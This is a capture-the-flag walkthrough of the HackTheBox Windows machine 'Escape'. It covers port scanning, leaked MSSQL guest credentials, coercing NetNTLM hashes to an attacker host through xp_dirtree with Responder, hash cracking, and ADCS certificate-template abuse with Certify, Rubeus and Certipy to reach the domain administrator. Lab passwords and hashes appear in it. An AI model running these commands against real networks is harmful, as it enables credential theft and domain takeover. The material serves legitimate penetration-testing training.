Escape
Port scan
$ sudo nmap 10.10.11.202 -p- -T4 --min-rate=10000 -sCV
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-06 11:28:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-06T11:29:53+00:00; -16h00m07s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-07-06T11:29:54+00:00; -16h00m07s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-06T11:19:35
|_Not valid after: 2054-07-06T11:19:35
|_ssl-date: 2024-07-06T11:29:53+00:00; -16h00m07s from scanner time.
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-07-06T11:29:53+00:00; -16h00m07s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-06T11:29:54+00:00; -16h00m07s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
53808/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -16h00m07s, deviation: 0s, median: -16h00m07s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-06T11:29:16
|_ start_date: N/A
SMB
$ smbclient -L //10.10.11.202/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
$ smbclient //10.10.11.202/Public
smb: \> get "SQL Server Procedures.pdf"
cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<userame>" /pass:<password>
PublicUser:GuestUserCantWrite1
MSSQL steal NetNTLM hash / Relay attack
Query SSL certs
$ openssl s_client -showcerts -connect 10.10.11.202:3269 | openssl x509 -noout -text
$ echo "10.10.11.202 dc.sequel.htb sequel.htb dc" | sudo tee -a /etc/hosts
$ impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
> SELECT name, database_id, create_date FROM sys.databases;
> use msdb;
> SELECT name FROM sys.tables;
# Check if xp_cmdshell is enabled
$ SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
$ sp_configure 'show advanced options', '1'
$ RECONFIGURE
#This enables xp_cmdshell
$ sp_configure 'xp_cmdshell', '1'
$ RECONFIGURE
$ EXEC master..xp_cmdshell 'whoami'
Cannot run xp_cmdshell and don't have permission to reconfig it. But in HackTricks Pentesting MSSQL - Microsoft SQL Server, it mentions xp_dirtree.
MSSQL Steal NetNTLM hash / Relay attack | HackTricks
Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
xp_dirtree '\\10.10.16.2\any\thing';
exec master.dbo.xp_dirtree '\\10.10.16.2\any\thing';
$ sudo responder -I tun0
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
REGGIE1234ronnie (sql_svc)
sql_svc
$ evil-winrm -i 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie'
$ Get-ChildItem -Path C:\Users\ -Include *.* -File -Recurse -ErrorAction SilentlyContinue
# C:\sqlserver\logs\ERRORLOG.BAK
> type ERRORLOG.BAK
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
Watch out the times of these error events. These three error messages almost happened at the same time. It might be a typo.
Ryan.Cooper
$ evil-winrm -i 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
Identify ADCS
One thing that always needs enumeration on a Windows domain is to look for Active Directory Certificate Services (ADCS). A quick way to check for this is using crackmapexec (and it works as either sql_svc or Ryan.Cooper):
$ crackmapexec ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs
ADCS Found PKI Enrollment Server: dc.sequel.htb
ADCS Found CN: sequel-DC-CA
> upload ../Tools/Certify.exe Certify.exe
> .\Certify.exe find /vulnerable
The danger here is that sequel\Domain Users has Enrollment Rights for the certificate (this is scenario 3 in the Certify README).
Abuse Template
With Certify / Rubeus
$ .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
Copy the text from -----BEGIN RSA PRIVATE KEY----- to -----END CERTIFICATE----- into a file called cert.pem and covert it to pfx without password.
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx
> .\Rubeus.exe asktgt /user:administrator /certificate:C:\users\ryan.cooper\cert.pfx /getcredentials /show /nowrap
NTLM: A52F78E4C751E5F5E17E1E9F3E58F4EE
With Certipy on Kali
$ certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable
$ certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target 10.10.11.202 -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
$ certipy-ad auth -pfx administrator.pfx
I can sync the clock with Escape using ntpdate:
$ sudo ntpdate -u sequel.htb
